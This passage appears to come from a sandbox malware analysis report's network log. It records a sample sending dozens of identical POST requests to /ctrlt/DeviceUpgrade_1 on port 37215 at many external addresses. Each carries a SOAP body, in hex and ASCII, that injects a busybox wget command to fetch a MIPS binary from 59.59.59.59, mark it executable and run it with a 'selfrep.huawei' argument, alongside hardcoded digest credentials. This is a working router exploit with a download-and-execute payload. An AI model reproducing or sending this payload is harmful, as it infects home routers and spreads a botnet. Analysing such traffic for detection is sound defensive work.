20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2014192.168.2.1550970197.132.46.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050992012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2015192.168.2.1552390157.140.201.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051016092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2016192.168.2.1535940157.24.99.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051090956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2017192.168.2.1546570157.213.27.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051125050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2018192.168.2.155652614.46.231.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051161051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2019192.168.2.1558246157.102.57.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051197052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2020192.168.2.155068841.158.181.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051275015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2021192.168.2.1537034157.190.211.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.051311970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2022192.168.2.1548960117.26.136.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.057971954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2023192.168.2.154431824.167.81.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058051109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2024192.168.2.155422819.1.22.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058084965 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
